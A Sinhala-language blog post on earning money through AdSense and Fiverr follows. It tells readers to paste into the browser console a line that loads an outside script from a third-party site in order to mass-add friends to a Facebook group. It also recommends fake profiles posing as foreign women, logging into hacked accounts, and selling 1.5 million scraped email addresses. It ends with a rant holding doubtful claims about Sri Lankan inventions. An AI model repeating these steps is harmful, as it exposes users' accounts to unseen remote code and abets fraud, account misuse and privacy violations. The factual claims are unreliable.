Thursday 2 January 2014

Google Adsense මගින් මුදල් ඉපයීම 16 - ඇඩ්සෙන්ස් මගින් මසකට $15,000+Fiverr..........

Google Adsense මගින් මුදල් ඉපයීම 16 - ඇඩ්සෙන්ස් මගින් මසකට $15,000+Fiverr..........


මේ ලිපියෙන් ලියන්න යන්නේ මූලික වශයෙන් ඇඩ්සෙන්ස් ගැන.ඇඩ්සෙන්ස් කියන දෙය ගැන කොපමණ කතා කළත් ඉවර වෙන පාටක් නැහැ.මොකද මේකට දවස ගානේ කතා කරන්න එක එක මාතෘකා එකතු වෙනවා.ඉතිං මම කලින් ලිපියකදී කිව්වා ඇඩ්සෙන්ස් හරහා මසකට $15,000ක් උපයන්න කියලා දෙනවා කියලා.සමහරු මගෙන් ඇහුවා බිංදුවක් දෙකක් වැරදිලා වැදිලද කියලා.නැහැ එහෙම දෙයක් නැහැ.මේ ලිපිය කියවලා බලන්නකෝ.ඔයාට ඒක සත්‍යයක් බවත් කළ හැකි දෙයක් බවත් තේරෙයි.

ඇඩ්සෙන්ස් මගින් මසකට $15,000.........

ඇත්තටම ඇඩ්සෙන්ස් මගින් එච්චර හොයන්න පුලුවන්ද?ගොඩක් අයගේ මතය වන්නේ ඇඩ්සෙන්ස් වලට වඩා ෆීවර් වලින් උපයන්න පුලුවන් කියලා.ඒත් මම දකින් ආකාරයට ෆීවර් වලට වඩා ඇඩ්සෙන්ස් මගින් මුදල් උපයන්න පුලුවන්.ෆීවර් වල අපි දිනකට ගිග්  25ක් කම්ප්ලීට් කළොත් අපිට ලැබෙන්නේ $100කි.එතකොට ගිග් 25 කම්ප්ලීට් කරන්න පට්ට වෙලාවක් යනවා.ඒත් ඇඩ්සෙන්ස් වල එහෙම නැහැ.මොකද ඇඩ්සෙන්ස් වල මුදල් ඉපයීම අසීමිතයි.මසකට $15,000 කියන්නේ දවසකට $500ක් තමා මගේ ඉලක්කය.නමුත් බොහෝ දෙනෙක් බලාපොරොත්තු වන්නේ ඇඩ්සෙන්ස් හරහා $100ක් ද ෆීවර් හරහා $1,000ක් විතර හොයන්න.ඒත් අද මම කියන්නම් ඔබට ඇඩ්සෙන්ස් මගින් මසකට $15,000ක් හොයන හැටි.

මසකට $15,000ක් වුණාම දිනකට $500.කරන්නේ මෙච්චරයි.අපේ බ්ලොග් එකේ අපි බ්ලොග් පෝස්ට් 500ක් දානවා.ඒවා අපිම ලියන ඒවා.උස්සපු ඒවා නෙමේ.ඒවායෙන් 50ක් හොද සුපිරි ඒවා වුණොත් ඒවා ගූගල් වල 1වන පි‍ටුවේ හසු වෙනවා කියලා හිතමු.එතකොට අපේ ඉලක්කය හරි.එක ලිපියකට $10 බැගින් ලිපි 50ට $500.මේක තමා ඉලක්කය.ඉතිං මේ ලිපි 500 ලියන්න ඔබට මාස 10 -12ක් යන්න පුලුවන්.ඒ කියන්නේ ඇඩ්සෙන්ස් පටන් ගත්තු ගමන් මසකට $15,000ක් බැහැ.ඒත් කල් ගතවන විට පුලුවන් කියලා.ඉතිං මේක කරන්න පුලුවන් වැඩක්.ඉතිං එතනදී වැදගත් වන දෙයක් ගැන තමා කියලා දෙන්න යන්නේ.ඒ තමා ෆේස්බුක් ගෲප් එකක් හදලා ඒකට මෙම්බර්ස්ලා පටපට ගාලා ගන්න හැටි තමා කියලා දෙන්න යන්නේ.

ඔබේම සාර්ථක Facebook Group එකක්.....

ගොඩක් අය ෆේස්බුක් ගෲප් හදනවානේ.ඒත් නැගලා යන්නෙ නැහැ කියලා මම දන්නවා.ගොඩක් අය කරන්නේ තමාගේ බ්ලොග් එක ප්‍රචාරණය කිරීමේ අරමුණින්.ඉතිං මේ අරමුණේ සාර්ථකත්වයට එන්නට හැකිවන්නේ ටික දෙනාටයි.හැමෝම ගෲප් හැදුවට ඒවායේ ඉන්නේ මෙම්බර්ස්ලා 1,000කට වඩා අඩු ගණනක්.ඒක නිසා අලුතෙන් මෙම්බර් කෙනෙක් ගෲප් එක දැක්කත් ජොයින් වෙන්නේ නැහැ.මොකද ඒක අසාර්ථක ගෲප් එකක් ලෙස ඔහු දකින නිසා.ඒක නිසා අඩුම ගානේ මෙම්බර්ස්ලා 10,000ක් වත් හිටියොත් ගොඩම් තමා.ඉතිං ඒක නිසා අද කියලා දෙන්න යන්නේ කොහොමද ෆේස්බුක් ගෲප් එකකට පට පට ගලා මෙම්බර්ස්ලා ඇඩ් කරන්නෙ කියලා.

මේකට ඔයාලට ෆේස්බුක් ප්‍රොෆයිල් කිහිපයක් තියෙන්න ඕන.වර්තමානය වන විට මා සතුව ෆේස්බුක් ප්‍රොෆයිල් 11ක් හා ෆ්‍රෙන්ඩ්ස්ලා 38,000ක් විතර ඉන්නවා.ඉතිං ඔයාලටත් මෙච්චර මිතුරන් නැතිනම් අවුලක් නැහැ.ඒකට පිලියම් තියෙනවා.අපි මුලින් ඔරිජිනල් ප්‍රොෆයිල් එකෙන් ගෲප් එක හදනවා.ඊට පස්සේ ගෲප් එකේ සෙටිංග්ස් පහත ආකාරයට හදන්න ඕන.
"Any member can add or approve members."

ඊට පස්සේ මේ වැඩේට ගූගල් ක්‍රෝම් තමා භාවිතා කරන්න ඕන.
1.දැන් ඔබ සතුව ඇති ෆේස්බුක් ප්‍රොෆයිල් එකට ලොග් වෙන්න.
2.ඊට පස්සේ ගෲප් එකේ හෝම් පේජ් එකට යන්න ඕන.

3.ඊට පස්සේ කී බෝර්ඩ් එකේ F12 කී එක ඔබන්න ඕන.(නැතිනම් රයිට් ක්ල්ක් කර ඉන්ස්පෙක්ට් එලමන්ට්ස් යන්න ඕන)

4.ඊට පස්සේ කී බෝර්ඩ් එකේ Esc කී එක ඔබන්න.


5.ඊට පස්සේ පහත කෝඩ් එක පේස්ට් කරලා එන්ටර් බටන් එක ඔබන්න.
කෝඩ් එක මෙතනින් බාගන්න.
document.body.appendChild(document.createElement('script')).src='http://fadhiilrachman.net/inpit.js';
6.දැන් ඔබේ ප්‍රොෆයිල් එකේ මිතුරන් ගෲප් එකට ඇඩ් වෙන්න පටන් ගනීවී.

7.මිනිත්තු කිහිපයකදී අවසන් වේවී.



ඔයාලා ෆයර්ෆොක්ස් භාවිතා කරනවා නම්,
1.Press Ctrl+Shift+K
2.Paste Code
3.Then Auto Start to add Members

ඉතිං ඔයාලට මේ විදියට මිතුරන් ඔබේ ගෲප් එකට ඇඩ් කරගන්න පුලුවන්.ඉතිං මේ ක්‍රමය භාවිතා කිරීමේන් කෙටිකාලයකදි විශලා මිතුරන් පිරිසක් ඇඩ් කරගන්න පුලුවන්.ආයේ එක්කෙනාගානේ ඇඩ් කරන්න ඕන නැහැ.ඉතිං ඇඩ්සෙන්ස් සදහා නම් අපේ ගෲප් එකට සුද්දන් ඇඩ් කර ගන්න ඕන.ඒකට අපේ ප්‍රොෆයිල් වල සුද්දෝ ඉන්න ඕන.ඉතිං අපි බොරු ප්‍රොෆයිල් හදන්න ඕන.එතනදී සුද්දියෙක් වගේ හැදුවොත් පට පට ගාලා සුද්දො හොයා ගන්න පුලුවන් වේවී.ඔයාලට මතක ඇති සුද්දො හොයා ගන්න හැටි මම ඇඩ්සෙන්ස් 11# වන ලිපියේ කියලා දුන්නා.ඒක බලන්න මෙතනින් යන්න.ඉතිං සුද්දෝ විතරක් නෙමේ.ලංකාවේ කස්ටියත් අපිට වැදගත් වෙනවා.මොකද අපේ සීටීආර් එක අඩු කර ගන්නත් ඒ වගේම් ඉම්ප්‍රශන් වලටත් මුදල් ගෙවන නිසාත්ය.ලංකාවේ අය ඇඩ් කරගන්න හරි ලේසියි.ඔබේ මිතුරන්ගේ ප්‍රොෆයිල් වල ඉන්න මිතුරන් ඉහත ආකාරය ඇඩ් කර ගන්න පුලුවන්.ඉතිං මෙතනදී ඔබේ මිතුරෙක් ලෙස මාව තොරා ගන්න එපා.එතකොට සුද්දොන්ව හොයන කොට ඔය හැක්වෙච්ච ප්‍රොෆයිල් පිලිබද නිතර අවධානයෙන් සිටින්න.ගූගල් සර්ච් කරලා හොයා ගන්න පුලුවන්නේ.එතකොට පුලුවන් ඒවායෙන් ලොග් වෙලා ගෲප් එකට සුද්දො හොයා ගන්න.

ඉතිං අදම වැඩේ පටන් ගන්න.අලුත් ඊමේල් ලිපින කිහිපයක් හදන්න.මේ සදහා යාහු මේල් සේවය භාවිතා කරනවා නම් හොදයි.මොකද අපිට යාහු හරහා ෆේස්බුක් ප්‍රොෆයිල් එකේ ඊමේල් නිස්සාරණය(එකතු කරගන්න) පුලුවන්.ඉතිං මේ ඊමේල් හදන කොට එකම පාස්වර්ඩ් එකක් යෙදුවොත් ලේසි වේවී.ඒ වගේම ඊමේ ලිපිනයත් මේආකාරයට හදා ගන්න.විමසුම්බ්ලොග්1@යාහුඩොට්කොම්, විමසුම්බ්ලොග්2@යාහුඩොට්කොම් ආදී වශයෙන් මතක තමා ගන්න පහසු ලෙස සකයන්න.ඊට පස්සේ ඔබ සකසන සියලු ඊමේල් හා ෆේස්බුක් ගිණුම් පිලිබද තොරතුරු ටෙක්ස් ෆයිල් එකක සේව් කරන්න අමතක කරන්න එපා.මොකද අපිට පහු පහු වෙනකොට ඒ ප්‍රොෆයිල් වල තොරතුරු අමතක වන නිසා.එක ප්‍රොෆයිල් එකකින් දිනකට මිතුරන් 50 ගානේ ප්‍රොෆයිල් 10ක් භාවිතා කළා නම් දිනකට මිතුරන් 500 ගානේ එකතු කර ගන්න පුලුවන්.ප්‍රොෆයිල් බ්ලොක් කර ගන්න එපා.


Fiverr මගින් මුදල්......

ඉතිං ඉහත ලිපිය කියෙව්වා නම් ෆීවර් පිලිබද කිසිදු අදහසක් එන්න ඇති.එහෙම ආවේ නැතිනම් පහත ටික බලන්න.මම මෙතන දක්වලා  තියෙන්නේ පහසුවෙන් කළ හැකි ගිග් කිහිපයක්.
1.ඔබේ ෆේස්බුක් ගෲප් එකකට ඇක්ටිව් මෙම්බර්ස්ලා 10,000ක් ඇඩ් කරනවා 
ඉතිං මේක කරන්න පුලුවන් වැඩක් කියලා තේරෙනවානේ.ඔතන මම 10,000 කියලා තිබුණට තරගකාරීත්වය අනුව එම අගය වෙනස් කරන්න වේවී.එතකොට ඔයාලට මතක ඇති මම අර ඊමේල් ලිපින මිලියන ගානක් ගිය ලිපියෙන් දුන්නා.ඒ අතර ෆේස්බුක් ඊමේල් ලිපින මිලියන 1.5ක් තියෙනවා.ඉතිං ඔයාලට කියන්න පුලුවන් මම ෆේස්බුක් ඊමේල් ලිපින මිලියන 1.5ක් දෙනවා මට තව $5ක් ඕන කියලා.ඒ වගේම ඔය ඊමේල් වල අඩංගු ඩුප්ලිකේට්ස් ඉවත් කරලා හා ප්‍රොෆයිල් යූආර් එල් එක අයින් කරලා දෙනවා ඒකට තව $5ක් ඕන කියලා.ඊට අමතරව මෙම්බර්ස්ලා 25ක් ඇඩ් කරනවා තව $10ක් ඕන කියලා කියන්න පුලුවන්.ඊමේල් වල ඩුප්ලිකේට්ස් අයින් කරන හැටි ගිය ලිපියෙදී කියලා දුන්නා.ඒක බලන්න මෙතනින් යන්න.

2.ඔබට මෙම්බර්ස්ලා 10,000ක් අඩංගු ෆේස්බුක් ගෲප් එකක් දෙනවා 
ඉතිං මෙතනදී කරන්න ඕන ෆේස්බුක් ප්‍රොෆයිල් එකක් හදනවා.ඒකේ ගෲප් එකක් හදනවා.ඒකට මෙම්බර්ස්ලා ඇඩ් කරනවා.ඊට පස්සේ විකුණනවා.ඉතිං මේක තමා ක්‍රියා පටිපාටිය.ඉතිං මම මෙතනදී 10,000 කියලා දැම්මාට තරගකාරීත්වය අනුව වෙනස් කරන්න වේවී.ඒ වගේම තව මෙම්බ්ර්ස් ලා 10,000කට $5ක් ද මෙම්බර්ස්ලා 25,000කට $10ක් ද ආදී වශයෙන් ඉල්ලන්න පුලුවන්.ඉතිං අර මිලියන 1.5 ෆේස්බුක් ඊමේල් ටිකත් මෙතනදි ඉහත ආකාරයටම විකුණගන්න පුලුවන්.

3.ඔබේ බ්ලොග්/වෙව් අඩවිය හෝ නිෂ්පාදනය මෙම්බර්ස්ලා 100,000කට වඩා වැඩි ගෲප් 25ක දවස් 7ක් ශෙයා කරනවා.
ඉතිං මේකත් කරන්න ඉතා ලේසි වැඩක්.ඉතිං ගෲප් හොයන හැටිත් මම කලින් කියලා දුන්නානේ.ගෲප් හොයන හැටි මම ඇඩ්සෙන්ස් 11# වන ලිපියේ කිව්වානේ.ඒක බලන්න මෙතනින් යන්න.ඉතිං ඔබට ෆේස්බුක් ඊමේල් මිලියන 1.5 සෙල්ලම මෙතනත් දාන්න පුලුවන්.

ඉතිං මේ වැඩේ දිගටම ෆීවර් හරහා කරන්න බලාපොරොත්තු වෙනවා නම් දවසගානේ මිතුරන් ඇඩ් කර ගන්න වෙනවා.ප්‍රොෆයිල් එක බ්ලොක් කර නොගැනීම වැදගත්.ඒ වගේම එකම රට වෙනුවට බෙල්ජියම ,ඇමරිකාව,ඕස්ට්‍රේලියාව,බ්‍රිතාන්‍යය,චීනය ආදී වශයෙන් පොෆයිල් එකෙන් ප්‍රොෆයිල් එකකට වෙනස් රටවල පිරිස් එකතු කර ගැනීම වැදගත්.අපි ප්‍රොෆයිල් එකකට මිතුරන් 4000ක් එකතු කර ගත්තාට ඒ 4000ම ගෲප් එකට ඇඩ් කරන්න බැහැ.ඒකට හේතුව සමහරුව ජොයින් විය හැකි උපරිම ගෲප් ගණන ඉක්මවා තියෙනවා.ඉතිං මේ ආකාරයට ෆීවර් හරහා මුදල් උපයන හැටිත් කථා කළා.

ඉතිං ඇඩ්සෙන්ස් කරන කොට එක බ්ලොග් එකකින් නොනැවතී ඉදිරියට යා යුතුයි.එතනදී ඔබගේ සෑම බ්ලොගක් වෙනුවෙන් මෙලෙස ගෲප් සෑදිම කළ හැකියි.ඒ වගේම ගෲප් එක පවත්වාගෙන යනකොට ස්පෑම් කරන  ස්ටිය ඉවත් කිරීමටත් හොද නීති රීත් මාලාවක් හදුන්වා දීමටත් ඔබ වගබලා ගත යුතුයි.


සමහරු මගෙන් ඇහුවා ඇඩ්සෙන්ස් කරන කොට බ්ලොග් එක ප්‍රචාරණයට බස්වල කෝච්චි වල තාප්ප වල අපේ බ්ලොග් අඩවියේ නම ලියන්න පුලුවන්ද කියලා ඇහුවා.මේවා මාව බයිට් කරන්න අහනවාද මන්දා.තව කෙනෙක් අහුවා මුදල් නෝට්‍ටු හැමදෙනා අතටම යන නිසා මුදල් නෝට්‍ටු වල ලියලා යවන්න පුලුවන් කියලා.ඔබ දන්නවාද මුදල් නෝට්‍ටු ප්‍රචාරණ කටයුතු සදහා යොදා ගැනීම 6 මසක සිරදඩුවමක් හෝ රු100,000 දඩයක් හෝ මෙම දඩුවම් දෙකම ලැබිය හැකි වරදක් බව.ඉතිං ලංකාවේ උන්ගේ හැටි තමා.කෙසේ වෙතත් අපේ ලංකාවේ එවුන් කවුරුත් නොදකින පැති දකිනවා.එකදහස් නමසිය අනූ ගණන් වල ලංකාවේ සිට අධ්‍යාපනය ලැබීමට හා ‍රැකියාවට ගිය කස්ටිය මුදල් වෙනුවට ටොනික් පියන් යකඩ් කෑලි මෙන්ම අයිස් පෙති තමා දුරකථන ඇමතුම් ගත් බව ඔබ දන්නවාද?ඒ වගේම චීනය,ඉන්දියාව,පකිස්තානය,බුරුමය,ජපානය,රුසියාව ඇතුලුව රටවල් සිය ගණන සහල් වගා කරනවා,නමුත් මේ හැමෝම යොදා ගන්න අත්ට්‍රැක්ටරය නිපදවූයේ ලංකාවේ අයෙක් බව ඔබ දන්නවාද?වර්ථමානය වන විට ලෝකයේ වෙනත් සමාගම් අත්ට්‍රැක්ටර් නිපදවුවාට වාර්ෂිකව විශාල මුදලක් පේටන් බලපත්‍රය වෙනුවෙන් ඔහුට ගෙවන බව ඔබ දන්නවාද?ඔහු ලංකාවේ කෝට්පති ලැයිස්තුවේ ඉන්න බව ඔබ දන්නවාද?පසුගිය කාලයේ ලංකාවේ කොල්ලෙක් ජලයෙන් ක්‍රියාකරන එන්ජිමක් නිපද වුවත් එයට පේටන් බලපත්‍රයක් ලබා දීමට ආණ්ඩුව කටයුතු නොකළ බව ඔබ දන්නවාද?ඔහුව කෝටි ගණනකට ජපානයේ හොන්ඩා සමාගම ලබාගත් බව ඔබ දන්නවාද?ලංකාව දියුණු කරන එක හරි ලේසි වැඩක්.වර්ථමානය වන විට පට්ට මෝල් කෙලින අණ්ඩුවක් නිසා අපට මොනා වේවිද?හයිවේ මගින් හෝ දියුණු මාර්ග පද්ධතියකින් හෝ වරායවල් මගින් හෝ ගුවන් තො‍ටුපලවල් මගින් රටක් සංවර්ධනය වේවිද?නැත රටක් සංවර්ධනය වීමට නව ‍රැකියා බිහිකරමින් නව කර්මාන්ත ශාලා අරඹමින් ආනයනය කරන සියලු දෑ ලංකාවේ නිපදවීමට කටයුතු කළ යුතුයි.ඒකෙන් කියන්නේ නැහැ හැම දේම කියලා.නමුත් ලංකාවේ නිපදවිය හැකි බොහෝ දෑ ආනයනය කරන බව ඔබ දන්නවාද?රටක් සංවර්ධනයට නම් අමුද්‍රව්‍ය වෙනුවට නිෂ්පාදන සැපයීමට අප සමත් විය යුතුයි.ලෝකයේ 99.99%ක් පිරිසිදු හොදම මිනිරන් ඇත්තේ ලංකාවේ බෝගල පතලේ පමණක් බව ඔබ දන්නවාද?එම මිනිරන් තුට්‍ටු දෙකට චීනුන් ඇමරිකානුවන් ඇතුලු රටවල් ගුවන්යානා නිපදවීමට වෙඩි බෙහෙත් නිපදවීමට භාවිතා කරන බව ඔබ දන්නවාද?ලෝකේ පිරිසිදුම මිනිරන් ඇති ලංකාවේ එක පැන්සල් කූරක්වත් නිපද නොවෙන බව ඔබ දන්නවාද?ලංකාවේ කෙතරම් රබර් නිෂ්පාදනය කළත් ඒවා අපනයනය කර කුඩා මකන කෑල්ල පවා ආනයනය කරන බව දන්නවාද?ඇත්තටම මේ දවස් වල ලොකු ගැටලුවක් වෙලා තියෙන්නේ විදුලි බලය.නොරොච්චෝලේ බලාගාරය චීනුන් හැදුවට මේක හැදුවේ ලංකාවේ 2002 වසරේදී සොයාගත් තාක්ෂණකින් බව ඔබ දන්නවාද?ඒක ඉතා ආඩම්භරයෙන් කීවත් වර්ථමානය වන විට මේ තාක්ෂණයේ දෝශයක් නිසා නිතර නිතර ගිණි ගැනීම් ඇති වන බව ඔබ දන්නවාද?අනෙකුත් තාප විදුලි බලාගාරත් අර ලංකාවේ තාක්ෂණයම යොදාගෙන නිපදවා ඇත්ද යන්න මම නිශ්චිතව නොදනිමි.මේ ලිපියෙන් ලංකාවේ ඉංජිනේරුවන්ට අපහස නොකරමි.නමුත් මෙවැනි දෙයක් කරන්න පෙර සිතා බැලිය යුතු නොවේද?ලංකාවේ හතර වටේම මුහුද තියෙන බව ඔබ දන්නවාද?නමුත් ලංකාවේ එක හුලං ගෙයක්වත් නැති බව ඔබ දන්නවාද?හොර්ටන් තැන්න(ලෝකාන්තය) යනු කොපමණ වායු ගෝලීය පීඩනයක් ඇති තැනක්ද යන්න ඔබ දන්නවාද?එහි හුලං ගෙවල් කිහිපයක් ඉදි කළොත් අලංකාරය වැඩි වන අතර මුලු උඩරටටම විදුලිය ලබා දිය හැකි බව ඔබ දන්නවාද?මම දන්නේ නැහැ මේ යක්කුන්ගේ මොලේ පුK ද යන්න.නමුත් වර්තමානය වන විය සිදු වන දේවල් ගැන කණගා‍ටුවක් තියෙනවා.

0 comments:

Post a Comment

 
Copyright © sambavana.com